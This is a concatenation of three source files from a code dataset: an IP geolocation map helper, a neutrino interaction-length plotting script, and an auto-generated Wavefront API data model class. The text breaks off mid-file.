COLLECTOR_ROOT\nimport logging\n\nlog = logging.getLogger()\n\n_MAPSTR = \"&markers=color:%s|%.6f,%.6f\"\n_MAPURLBASE = \"http://maps.google.com/maps/api/staticmap?zoom=1&size=500x300&sensor=false\"\n\nclass Geo:\n def __init__(self,ipaddress=False):\n self.ipaddress = ipaddress\n\n def getUrl(self,mapbase=_MAPURLBASE):\n maps = []\n colors = ['red', 'yellow']\n try:\n gic = pygeoip.GeoIP(os.path.join(COLLECTOR_ROOT,\"geo\",'GeoLiteCity.dat'), pygeoip.MEMORY_CACHE)\n for ip,rep,status in self.ipaddress:\n if status[\"status\"] == True:\n coloridx = 0\n else:\n coloridx = 1\n data = gic.record_by_addr(ip)\n maps += [_MAPSTR % (colors[coloridx],\n data['latitude'],\n data['longitude'])\n ]\n url = mapbase + 
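# --- Editor's note: illustrative sketch, not part of the original dataset record.
# The Geo class above builds a Google Static Maps URL by concatenating one
# marker parameter per IP address. The core of that string assembly,
# isolated into a pure function (`build_map_url` is a hypothetical name):

_MAPSTR = "&markers=color:%s|%.6f,%.6f"
_MAPURLBASE = ("http://maps.google.com/maps/api/staticmap"
               "?zoom=1&size=500x300&sensor=false")

def build_map_url(points):
    # points: iterable of (color, latitude, longitude)
    markers = [_MAPSTR % (color, lat, lon) for color, lat, lon in points]
    return _MAPURLBASE + "".join(markers)

url = build_map_url([("red", 55.7558, 37.6173), ("yellow", 40.7128, -74.0060)])
assert url.count("markers=color") == 2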
\"\".join(maps)\n FinalMap = requests.get(url)\n out = open(os.path.join(COLLECTOR_ROOT,\"tmp\",\"worldmap.png\"),\"wb\")\n out.write(FinalMap.content)\n out.close()\n except Exception as error:\n log.error(error)\n\n\"\"\"def main():\n url = getUrl(ipaddress)\n print url\n pass\n\nif __name__ == '__main__':\n main()\"\"\"\n","repo_name":"cnbird1999/triana","sub_path":"util/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42262303821","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Mauricio Bustamante\"\n__email__ = \"mbustamante@nbi.ku.dk\"\n\n\n\"\"\"\ninteraction_length.py:\n Routines to calculate neutrino-neutrino interaction length\n\nCreated: 2018/09/30 18:25\nLast modified: 2018/09/30 18:25\n\"\"\"\n\n\nimport numpy as np\nfrom pylab import *\nfrom matplotlib import *\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nfrom cross_section import *\nfrom global_defs import *\nfrom cosmology import *\n\ndef Interaction_Length_Nu_Nu(energy_nu, z, mass_mediator, \\\n coupling_mediator, mass_neutrino=1.e-10):\n\n # [cm^2]\n cross_section = Cross_Section_Nu_Nu_S_Channel_Scalar(energy_nu,\n mass_mediator, coupling_mediator, mass_neutrino=mass_neutrino)\n\n # [cm^{-3}]\n target_spectrum = 56. * pow(1.0+z, 3.0)\n\n # [cm]\n int_length = 1.0/(cross_section*target_spectrum)\n\n return int_length # [cm]\n\n\n\ndef Plot_Interaction_Length_Nu_Nu_Models_A_B_C_D(\\\n log10_energy_nu_min = 5.0, log10_energy_nu_max=8.0,\n log10_energy_nu_npts=100, lst_redshift=[0.0],\n lst_mass_mediator=[0.1], lst_coupling_mediator=[0.3], lst_legends=[''],\n lst_labels=[''], mass_neutrino=1.e-10, filename_out='int_length',\n output_format='pdf'):\n\n print(\"Plot_Interaction_Length_Nu_Nu_Models_A_B_C_D: \"+ \\\n \"Plotting interaction length nu-nu s-channel, scalar mediator...\")\n\n # Open the plot and format it\n mpl.rcParams['xtick.labelsize']=26\n mpl.rcParams['ytick.labelsize']=26\n mpl.rcParams['legend.fontsize']=18\n mpl.rcParams['legend.borderpad']=0.4\n mpl.rcParams['axes.labelpad']=10\n mpl.rcParams['ps.fonttype']=42\n mpl.rcParams['pdf.fonttype']=42\n\n # Neutrino energy [GeV]\n lst_log10_energy_nu = \\\n np.linspace(log10_energy_nu_min, log10_energy_nu_max, \\\n log10_energy_nu_npts) # [GeV]\n lst_energy_nu_base = [10.**x for x in lst_log10_energy_nu] # [GeV]\n\n lst_colors = ['C0', 'C1', 'C2', 'C3']\n lst_ls = ['-', '--', ':', '-.']\n\n fig, axes = plt.subplots(len(lst_mass_mediator), 1, figsize=[9,9],\n sharex=True)\n fig.subplots_adjust(hspace=0.05, wspace=0.38) #0.05\n\n for i in range(len(axes)):\n\n ax = axes[i]\n mass_mediator = lst_mass_mediator[i]\n coupling_mediator = lst_coupling_mediator[i]\n\n # Calculate resonance energy\n energy_nu_res = mass_mediator*mass_mediator/2.0/mass_neutrino\n lst_energy_nu = lst_energy_nu_base + [energy_nu_res]\n lst_energy_nu.sort()\n\n for j, z in enumerate(lst_redshift):\n\n color = lst_colors[j]\n ls = lst_ls[j]\n legend = lst_legends[j]\n\n lst_int_length = [Interaction_Length_Nu_Nu(energy_nu, z,\n mass_mediator, coupling_mediator,\n mass_neutrino=mass_neutrino) * \\\n conv_cm_to_Mpc*1.e6 \\\n for energy_nu in lst_energy_nu]\n\n ax.plot(lst_energy_nu, lst_int_length, color=color, ls=ls,\n label=legend)\n\n ax.tick_params('both', length=10, width=2, which='major')\n ax.tick_params('both', length=5, width=1, which='minor')\n ax.tick_params(axis='both', which='major', pad=10, direction='in')\n 
ax.tick_params(axis='both', which='minor', pad=10, direction='in')\n ax.tick_params(axis='y', which='minor', left='on')\n ax.tick_params(axis='y', which='minor', right='on')\n ax.tick_params(axis='x', which='minor', bottom='on')\n ax.tick_params(axis='x', which='minor', top='on')\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n\n if (i == 0):\n ax.annotate( r'xxxxxxx', \\\n xy = (0.825,0.76), \\\n xycoords='axes fraction', color=None, alpha=0.0, fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6,\n bbox=dict(boxstyle='round', fc=\"wheat\", alpha=0.5, ec=\"k\") )\n ax.annotate( lst_labels[i], \\\n xy = (0.82,0.74), \\\n xycoords='axes fraction', color='k', fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6 )\n else:\n ax.annotate( r'xxxxxxx', \\\n xy = (0.825,0.23), \\\n xycoords='axes fraction', color=None, alpha=0.0, fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6,\n bbox=dict(boxstyle='round', fc=\"wheat\", alpha=0.5, ec=\"k\") )\n ax.annotate( lst_labels[i], \\\n xy = (0.82,0.21), \\\n xycoords='axes fraction', color='k', fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6 )\n\n if (i != 3):\n # ax.xaxis.set_visible(False)\n # ax.ravel().set_axis_off()\n ax.get_xaxis().set_ticklabels([])\n # ax.xaxis.set_major_formatter(plt.NullFormatter())\n\n # ax.set_xticklabels([])\n if (i == 3):\n ax.set_xlabel(r'Neutrino energy $E$ [GeV]', fontsize=25)\n # if (i != 3):\n # ax.set_xlabel('', fontsize=25)\n if (i == 1):\n ax.set_ylabel(r'Interaction length $\\nu\\nu$ $s$-channel [pc]', fontsize=25)\n ax.yaxis.set_label_coords(-0.13, -0.025)\n\n if (i == 0):\n ax.legend(loc='lower left', ncol=2)\n\n # pylab.xlim([10.**log10_energy_nu_min, 10.**log10_energy_nu_max])\n ax.set_xlim([10.**log10_energy_nu_min, 10.**log10_energy_nu_max])\n ax.set_xscale('log')\n\n # pylab.ylim([1e-31, 1e-20])\n ax.set_yscale('log')\n\n log10_int_length_min = floor(log10(min(lst_int_length)))\n log10_int_length_max = ceil(log10(max(lst_int_length)))\n lst_log10_int_length = np.linspace(log10_int_length_min,\n log10_int_length_max,\n log10_int_length_max-log10_int_length_min+1)\n ax_yticks_major = [10.**log10_int_length\n for log10_int_length in lst_log10_int_length[::3]]\n ax_yticks_minor = [10.**log10_int_length\n for log10_int_length in lst_log10_int_length[::1]]\n # print(lst_log10_int_length)\n\n # if (i == 0):\n # print(min(lst_int_length), max(lst_int_length))\n # ax_yticks_major = np.array([1.e-31, 1.e-30, 1.e-29, 1.e-28, 1.e-27, \\\n # 1.e-26, 1.e-25, 1.e-24, 1.e-23, 1.e-22, 1.e-21, \\\n # 1.e-20])\n\n ax.yaxis.set_major_locator(matplotlib.ticker.FixedLocator( \\\n ax_yticks_major))\n # ax.yaxis.set_minor_locator(matplotlib.ticker.FixedLocator( \\\n # ax_yticks_minor))\n\n # Save the plot\n filename_out = os.getcwd()+'/output/plots/'+filename_out\n pylab.savefig(filename_out+'.'+output_format, \\\n bbox_inches='tight', dpi=300)\n plt.close()\n\n return\n\n\n###############################################################################\n###############################################################################\n\n\n\ndef Plot_Lookback_Distance_Between_Redshifts( \\\n filename_out='distance_between_redshifts',\n log10_delta_z_min=-10., log10_delta_z_max=0., log10_delta_z_npts=10,\n lst_z_base=[0.01], energy_nu_min=1.e3, energy_nu_max=1.e7,\n output_format='pdf', lst_mass_mediator=[0.1], lst_coupling_mediator=[0.3],\n mass_neutrino=1.e-10):\n\n print(\"Plot_Lookback_Distance_Between_Redshifts: \"+ \\\n \"Plotting lookback distance 
between two redshifts...\")\n\n # Open the plot and format it\n mpl.rcParams['xtick.labelsize']=26\n mpl.rcParams['ytick.labelsize']=26\n mpl.rcParams['legend.fontsize']=18\n mpl.rcParams['legend.borderpad']=0.4\n mpl.rcParams['axes.labelpad']=10\n mpl.rcParams['ps.fonttype']=42\n mpl.rcParams['pdf.fonttype']=42\n\n # Neutrino energy [GeV]\n lst_log10_delta_z = \\\n np.linspace(log10_delta_z_min, log10_delta_z_max, \\\n log10_delta_z_npts) # [GeV]\n lst_delta_z = [10.**log10_delta_z for log10_delta_z in lst_log10_delta_z]\n\n lst_colors = ['C0', 'C1', 'C2', 'C3', 'C4']\n lst_ls = ['-', '--', ':', '-.', (0, (1, 1))]\n\n fig, ax = plt.subplots(1, 1, figsize=[9,9])\n\n for i, z_base in enumerate(lst_z_base):\n\n ls = lst_ls[i]\n\n lst_delta_z_sel = []\n lst_delta_dist = []\n for delta_z in lst_delta_z:\n if (z_base-delta_z >= 0):\n lst_delta_z_sel.append(delta_z)\n dist_diff = \\\n 1.e3*(Lookback_Distance(z_base)-Lookback_Distance(z_base-delta_z)) # [Mpc]\n lst_delta_dist.append(dist_diff)\n\n # Plot the distance difference\n ax.plot(lst_delta_z_sel, lst_delta_dist, color='k', ls=ls, lw=2.0,\n label=r'$z_i = $'+' '+str(z_base), zorder=4)\n\n # Plot interaction lengths\n # int_length_energy_nu_min = \\\n # Interaction_Length_Nu_Nu(energy_nu_min, z_base, mass_mediator, \\\n # coupling_mediator, mass_neutrino)*conv_cm_to_Mpc\n # int_length_energy_nu_max = \\\n # Interaction_Length_Nu_Nu(energy_nu_max, z_base, mass_mediator, \\\n # coupling_mediator, mass_neutrino)*conv_cm_to_Mpc\n # ax.fill_between([min(lst_delta_z), max(lst_delta_z)],\n # [int_length_energy_nu_min, int_length_energy_nu_min],\n # [int_length_energy_nu_max, int_length_energy_nu_max],\n # edgecolor=None, facecolor=color, alpha=0.5, zorder=2)\n\n for j in range(len(lst_mass_mediator)):\n color = lst_colors[j]\n mass_mediator = lst_mass_mediator[j] # [GeV]\n coupling_mediator = lst_coupling_mediator[j]\n energy_nu_res = mass_mediator*mass_mediator/2.0/mass_neutrino # [GeV]\n int_length = \\\n Interaction_Length_Nu_Nu(energy_nu_res, z_base, mass_mediator, \\\n coupling_mediator, mass_neutrino)*conv_cm_to_Mpc\n ax.plot([min(lst_delta_z), max(lst_delta_z)],\n [int_length, int_length], color=color, ls=ls, lw=2.0, zorder=4)\n\n for i in range(len(lst_mass_mediator)):\n color = lst_colors[i]\n mass_mediator = lst_mass_mediator[i] # [GeV]\n coupling_mediator = lst_coupling_mediator[i]\n energy_nu_res = mass_mediator*mass_mediator/2.0/mass_neutrino # [GeV]\n int_length_top = \\\n Interaction_Length_Nu_Nu(energy_nu_res, lst_z_base[0], \\\n mass_mediator, coupling_mediator, mass_neutrino)*conv_cm_to_Mpc\n int_length_bottom = \\\n Interaction_Length_Nu_Nu(energy_nu_res, lst_z_base[-1], \\\n mass_mediator, coupling_mediator, mass_neutrino)*conv_cm_to_Mpc\n ax.fill_between([min(lst_delta_z), max(lst_delta_z)],\n [int_length_top, int_length_top],\n [int_length_bottom, int_length_bottom],\n edgecolor=None, facecolor=color, alpha=0.4, zorder=2)\n\n ax.annotate( r'$L(z_i)-L(z_f)$', \\\n xy = (0.42,0.58), \\\n xycoords='axes fraction', color='k', alpha=1.0, fontsize=21, \\\n horizontalalignment='left', rotation=47, zorder=6)\n ax.annotate( r'$L_{\\nu\\nu, \\rm int}(E_{\\rm res})$ -- Model A', \\\n xy = (0.04,0.90), \\\n xycoords='axes fraction', color=lst_colors[0], alpha=1.0, fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6)\n ax.annotate( r'$L_{\\nu\\nu, \\rm int}(E_{\\rm res})$ -- Model D', \\\n xy = (0.55,0.35), \\\n xycoords='axes fraction', color=lst_colors[1], alpha=1.0, fontsize=21, \\\n horizontalalignment='left', 
rotation=0, zorder=6)\n\n ax.tick_params('both', length=10, width=2, which='major')\n ax.tick_params('both', length=5, width=1, which='minor')\n ax.tick_params(axis='both', which='major', pad=10, direction='in')\n ax.tick_params(axis='both', which='minor', pad=10, direction='in')\n ax.tick_params(axis='y', which='minor', left='on')\n ax.tick_params(axis='y', which='minor', right='on')\n ax.tick_params(axis='x', which='minor', bottom='on')\n ax.tick_params(axis='x', which='minor', top='on')\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n\n ax.set_xlabel(r'Redshift difference $\\Delta z = z_i - z_f$', fontsize=25)\n ax.set_ylabel(r'Lookback distance $L$ between $z_i$ and $z_f$ [Mpc]', fontsize=25)\n ax.legend(loc='lower right', ncol=1)\n\n # ax.set_xlim([10.**log10_delta_z_min, 10.**log10_delta_z_max])\n ax.set_xlim([10.**log10_delta_z_min, 1.e-3])\n ax.set_ylim([1.e-9, 2.e-2])\n ax.set_xscale('log')\n ax.set_yscale('log')\n\n ax_xticks_major = [1.e-10, 1.e-9, 1.e-8, 1.e-7, 1.e-6, 1.e-5, 1.e-4, 1.e-3]\n # ax_xticks_minor = [1.e-9, 1.e-7, 1.e-5, 1.e-3]\n ax.xaxis.set_major_locator(matplotlib.ticker.FixedLocator( \\\n ax_xticks_major))\n # ax.xaxis.set_minor_locator(matplotlib.ticker.FixedLocator( \\\n # ax_xticks_minor))\n\n # Save the plot\n filename_out = os.getcwd()+'/output/plots/'+filename_out\n pylab.savefig(filename_out+'.'+output_format, \\\n bbox_inches='tight', dpi=300)\n plt.close()\n\n return\n\n\n\n###############################################################################\n###############################################################################\n\n\nPlot_Lookback_Distance_Between_Redshifts( \\\n filename_out='distance_between_redshifts_model_A',\n log10_delta_z_min=-10.5, log10_delta_z_max=0., log10_delta_z_npts=10,\n lst_z_base=[0.01, 2.0, 4.0, 6.0], output_format='pdf',\n lst_mass_mediator=[0.1, 0.001],\n lst_coupling_mediator=[0.3, 0.01],\n mass_neutrino=1.e-10,\n energy_nu_min=1.e3, energy_nu_max=1.e8)\n # lst_mass_mediator=[0.1, 0.01, 0.003, 0.001],\n # lst_coupling_mediator=[0.3, 0.03, 0.03, 0.01],\n\n\n###############################################################################\n###############################################################################\n\n\n\"\"\"\nPlot_Interaction_Length_Nu_Nu_Models_A_B_C_D(\\\n log10_energy_nu_min = 3.0, log10_energy_nu_max=8.0,\n log10_energy_nu_npts=1000, lst_redshift=[0.0, 2.0, 4.0, 6.0],\n lst_mass_mediator=[0.1, 0.01, 0.003, 0.001],\n lst_coupling_mediator=[0.3, 0.03, 0.03, 0.01],\n mass_neutrino=1.e-10, filename_out='int_length', output_format='pdf',\n lst_legends=[r'$z = 0$', r'$z = 2$', r'$z = 4$', r'$z = 6$'],\n lst_labels=['Model A', 'Model B', 'Model C', 'Model D'])\nquit()\n\"\"\"\n","repo_name":"mbustama/secret-nu-int","sub_path":"code/interaction_length.py","file_name":"interaction_length.py","file_ext":"py","file_size_in_byte":14326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20803068234","text":"# coding: utf-8\n\n\"\"\"\n Wavefront REST API Documentation\n\n

The REST API enables you to interact with the Wavefront service using standard REST API tools. You can use it to automate commonly executed operations, for example tagging sources automatically.

When you make REST API calls outside the REST API documentation UI, you must authenticate to the service with an API token associated with a user account or a service account. For information on how to obtain an API token, and for examples, see "Use the Wavefront REST API".
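As an illustrative sketch only (the cluster host and token below are placeholders, not values shipped with this client), a raw call outside this client passes the token in a Bearer authorization header:

    import requests  # hypothetical direct call, bypassing the generated client

    # Placeholder cluster URL and API token -- replace with your own values.
    response = requests.get(
        "https://YOUR_CLUSTER.wavefront.com/api/v2/source",
        headers={"Authorization": "Bearer YOUR_API_TOKEN"},
    )
    response.raise_for_status()
    print(response.json())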

# noqa: E501\n\n OpenAPI spec version: v2\n Contact: chitimba@wavefront.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom wavefront_api_client.configuration import Configuration\n\n\nclass MonitoredServiceDTO(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'application': 'str',\n 'cluster': 'str',\n 'component': 'str',\n 'created': 'int',\n 'custom_dashboard_link': 'str',\n 'favorite': 'bool',\n 'hidden': 'bool',\n 'id': 'str',\n 'last_reported': 'int',\n 'last_updated': 'int',\n 'origin': 'str',\n 'satisfied_latency_millis': 'int',\n 'service': 'str',\n 'service_instance_count': 'int',\n 'source': 'str',\n 'status': 'str',\n 'update_user_id': 'str'\n }\n\n attribute_map = {\n 'application': 'application',\n 'cluster': 'cluster',\n 'component': 'component',\n 'created': 'created',\n 'custom_dashboard_link': 'customDashboardLink',\n 'favorite': 'favorite',\n 'hidden': 'hidden',\n 'id': 'id',\n 'last_reported': 'lastReported',\n 'last_updated': 'lastUpdated',\n 'origin': 'origin',\n 'satisfied_latency_millis': 'satisfiedLatencyMillis',\n 'service': 'service',\n 'service_instance_count': 'serviceInstanceCount',\n 'source': 'source',\n 'status': 'status',\n 'update_user_id': 'updateUserId'\n }\n\n def __init__(self, application=None, cluster=None, component=None, created=None, custom_dashboard_link=None, favorite=None, hidden=None, id=None, last_reported=None, last_updated=None, origin=None, satisfied_latency_millis=None, service=None, service_instance_count=None, source=None, status=None, update_user_id=None, _configuration=None): # noqa: E501\n \"\"\"MonitoredServiceDTO - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._application = None\n self._cluster = None\n self._component = None\n self._created = None\n self._custom_dashboard_link = None\n self._favorite = None\n self._hidden = None\n self._id = None\n self._last_reported = None\n self._last_updated = None\n self._origin = None\n self._satisfied_latency_millis = None\n self._service = None\n self._service_instance_count = None\n self._source = None\n self._status = None\n self._update_user_id = None\n self.discriminator = None\n\n self.application = application\n if cluster is not None:\n self.cluster = cluster\n self.component = component\n if created is not None:\n self.created = created\n if custom_dashboard_link is not None:\n self.custom_dashboard_link = custom_dashboard_link\n if favorite is not None:\n self.favorite = favorite\n if hidden is not None:\n self.hidden = hidden\n if id is not None:\n self.id = id\n if last_reported is not None:\n self.last_reported = last_reported\n if last_updated is not None:\n self.last_updated = last_updated\n if origin is not None:\n self.origin = origin\n if satisfied_latency_millis is not None:\n self.satisfied_latency_millis = satisfied_latency_millis\n self.service = service\n self.service_instance_count = service_instance_count\n self.source = source\n if status is not None:\n self.status = status\n if update_user_id is not None:\n self.update_user_id = update_user_id\n\n 
@property\n def application(self):\n \"\"\"Gets the application of this MonitoredServiceDTO. # noqa: E501\n\n Application Name of the monitored service # noqa: E501\n\n :return: The application of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._application\n\n @application.setter\n def application(self, application):\n \"\"\"Sets the application of this MonitoredServiceDTO.\n\n Application Name of the monitored service # noqa: E501\n\n :param application: The application of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n if self._configuration.client_side_validation and application is None:\n raise ValueError(\"Invalid value for `application`, must not be `None`\") # noqa: E501\n\n self._application = application\n\n @property\n def cluster(self):\n \"\"\"Gets the cluster of this MonitoredServiceDTO. # noqa: E501\n\n Cluster of monitored service # noqa: E501\n\n :return: The cluster of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._cluster\n\n @cluster.setter\n def cluster(self, cluster):\n \"\"\"Sets the cluster of this MonitoredServiceDTO.\n\n Cluster of monitored service # noqa: E501\n\n :param cluster: The cluster of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._cluster = cluster\n\n @property\n def component(self):\n \"\"\"Gets the component of this MonitoredServiceDTO. # noqa: E501\n\n Component Name of the monitored service # noqa: E501\n\n :return: The component of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._component\n\n @component.setter\n def component(self, component):\n \"\"\"Sets the component of this MonitoredServiceDTO.\n\n Component Name of the monitored service # noqa: E501\n\n :param component: The component of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n if self._configuration.client_side_validation and component is None:\n raise ValueError(\"Invalid value for `component`, must not be `None`\") # noqa: E501\n\n self._component = component\n\n @property\n def created(self):\n \"\"\"Gets the created of this MonitoredServiceDTO. # noqa: E501\n\n Created epoch of monitored service # noqa: E501\n\n :return: The created of this MonitoredServiceDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._created\n\n @created.setter\n def created(self, created):\n \"\"\"Sets the created of this MonitoredServiceDTO.\n\n Created epoch of monitored service # noqa: E501\n\n :param created: The created of this MonitoredServiceDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._created = created\n\n @property\n def custom_dashboard_link(self):\n \"\"\"Gets the custom_dashboard_link of this MonitoredServiceDTO. # noqa: E501\n\n Customer dashboard link # noqa: E501\n\n :return: The custom_dashboard_link of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._custom_dashboard_link\n\n @custom_dashboard_link.setter\n def custom_dashboard_link(self, custom_dashboard_link):\n \"\"\"Sets the custom_dashboard_link of this MonitoredServiceDTO.\n\n Customer dashboard link # noqa: E501\n\n :param custom_dashboard_link: The custom_dashboard_link of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._custom_dashboard_link = custom_dashboard_link\n\n @property\n def favorite(self):\n \"\"\"Gets the favorite of this MonitoredServiceDTO. # noqa: E501\n\n favorite status of monitored service # noqa: E501\n\n :return: The favorite of this MonitoredServiceDTO. 
# noqa: E501\n :rtype: bool\n \"\"\"\n return self._favorite\n\n @favorite.setter\n def favorite(self, favorite):\n \"\"\"Sets the favorite of this MonitoredServiceDTO.\n\n favorite status of monitored service # noqa: E501\n\n :param favorite: The favorite of this MonitoredServiceDTO. # noqa: E501\n :type: bool\n \"\"\"\n\n self._favorite = favorite\n\n @property\n def hidden(self):\n \"\"\"Gets the hidden of this MonitoredServiceDTO. # noqa: E501\n\n Monitored service is hidden or not # noqa: E501\n\n :return: The hidden of this MonitoredServiceDTO. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._hidden\n\n @hidden.setter\n def hidden(self, hidden):\n \"\"\"Sets the hidden of this MonitoredServiceDTO.\n\n Monitored service is hidden or not # noqa: E501\n\n :param hidden: The hidden of this MonitoredServiceDTO. # noqa: E501\n :type: bool\n \"\"\"\n\n self._hidden = hidden\n\n @property\n def id(self):\n \"\"\"Gets the id of this MonitoredServiceDTO. # noqa: E501\n\n unique ID of monitored service # noqa: E501\n\n :return: The id of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this MonitoredServiceDTO.\n\n unique ID of monitored service # noqa: E501\n\n :param id: The id of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._id = id\n\n @property\n def last_reported(self):\n \"\"\"Gets the last_reported of this MonitoredServiceDTO. # noqa: E501\n\n Last reported epoch of monitored service # noqa: E501\n\n :return: The last_reported of this MonitoredServiceDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._last_reported\n\n @last_reported.setter\n def last_reported(self, last_reported):\n \"\"\"Sets the last_reported of this MonitoredServiceDTO.\n\n Last reported epoch of monitored service # noqa: E501\n\n :param last_reported: The last_reported of this MonitoredServiceDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._last_reported = last_reported\n\n @property\n def last_updated(self):\n \"\"\"Gets the last_updated of this MonitoredServiceDTO. # noqa: E501\n\n Last update epoch of monitored service # noqa: E501\n\n :return: The last_updated of this MonitoredServiceDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._last_updated\n\n @last_updated.setter\n def last_updated(self, last_updated):\n \"\"\"Sets the last_updated of this MonitoredServiceDTO.\n\n Last update epoch of monitored service # noqa: E501\n\n :param last_updated: The last_updated of this MonitoredServiceDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._last_updated = last_updated\n\n @property\n def origin(self):\n \"\"\"Gets the origin of this MonitoredServiceDTO. # noqa: E501\n\n origin of monitored service # noqa: E501\n\n :return: The origin of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._origin\n\n @origin.setter\n def origin(self, origin):\n \"\"\"Sets the origin of this MonitoredServiceDTO.\n\n origin of monitored service # noqa: E501\n\n :param origin: The origin of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._origin = origin\n\n @property\n def satisfied_latency_millis(self):\n \"\"\"Gets the satisfied_latency_millis of this MonitoredServiceDTO. # noqa: E501\n\n Satisfied latency of monitored service # noqa: E501\n\n :return: The satisfied_latency_millis of this MonitoredServiceDTO. 
# noqa: E501\n :rtype: int\n \"\"\"\n return self._satisfied_latency_millis\n\n @satisfied_latency_millis.setter\n def satisfied_latency_millis(self, satisfied_latency_millis):\n \"\"\"Sets the satisfied_latency_millis of this MonitoredServiceDTO.\n\n Satisfied latency of monitored service # noqa: E501\n\n :param satisfied_latency_millis: The satisfied_latency_millis of this MonitoredServiceDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._satisfied_latency_millis = satisfied_latency_millis\n\n @property\n def service(self):\n \"\"\"Gets the service of this MonitoredServiceDTO. # noqa: E501\n\n Service Name of the monitored service # noqa: E501\n\n :return: The service of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._service\n\n @service.setter\n def service(self, service):\n \"\"\"Sets the service of this MonitoredServiceDTO.\n\n Service Name of the monitored service # noqa: E501\n\n :param service: The service of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n if self._configuration.client_side_validation and service is None:\n raise ValueError(\"Invalid value for `service`, must not be `None`\") # noqa: E501\n\n self._service = service\n\n @property\n def service_instance_count(self):\n \"\"\"Gets the service_instance_count of this MonitoredServiceDTO. # noqa: E501\n\n Service Instance count of the monitored service # noqa: E501\n\n :return: The service_instance_count of this MonitoredServiceDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._service_instance_count\n\n @service_instance_count.setter\n def service_instance_count(self, service_instance_count):\n \"\"\"Sets the service_instance_count of this MonitoredServiceDTO.\n\n Service Instance count of the monitored service # noqa: E501\n\n :param service_instance_count: The service_instance_count of this MonitoredServiceDTO. # noqa: E501\n :type: int\n \"\"\"\n if self._configuration.client_side_validation and service_instance_count is None:\n raise ValueError(\"Invalid value for `service_instance_count`, must not be `None`\") # noqa: E501\n\n self._service_instance_count = service_instance_count\n\n @property\n def source(self):\n \"\"\"Gets the source of this MonitoredServiceDTO. # noqa: E501\n\n Source of the monitored service # noqa: E501\n\n :return: The source of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._source\n\n @source.setter\n def source(self, source):\n \"\"\"Sets the source of this MonitoredServiceDTO.\n\n Source of the monitored service # noqa: E501\n\n :param source: The source of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n if self._configuration.client_side_validation and source is None:\n raise ValueError(\"Invalid value for `source`, must not be `None`\") # noqa: E501\n\n self._source = source\n\n @property\n def status(self):\n \"\"\"Gets the status of this MonitoredServiceDTO. # noqa: E501\n\n Status of monitored service # noqa: E501\n\n :return: The status of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"Sets the status of this MonitoredServiceDTO.\n\n Status of monitored service # noqa: E501\n\n :param status: The status of this MonitoredServiceDTO. 
# noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"ACTIVE\", \"INACTIVE\"] # noqa: E501\n if (self._configuration.client_side_validation and\n status not in allowed_values):\n raise ValueError(\n \"Invalid value for `status` ({0}), must be one of {1}\" # noqa: E501\n .format(status, allowed_values)\n )\n\n self._status = status\n\n @property\n def update_user_id(self):\n \"\"\"Gets the update_user_id of this MonitoredServiceDTO. # noqa: E501\n\n Last update user id of monitored service # noqa: E501\n\n :return: The update_user_id of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._update_user_id\n\n @update_user_id.setter\n def update_user_id(self, update_user_id):\n \"\"\"Sets the update_user_id of this MonitoredServiceDTO.\n\n Last update user id of monitored service # noqa: E501\n\n :param update_user_id: The update_user_id of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._update_user_id = update_user_id\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = 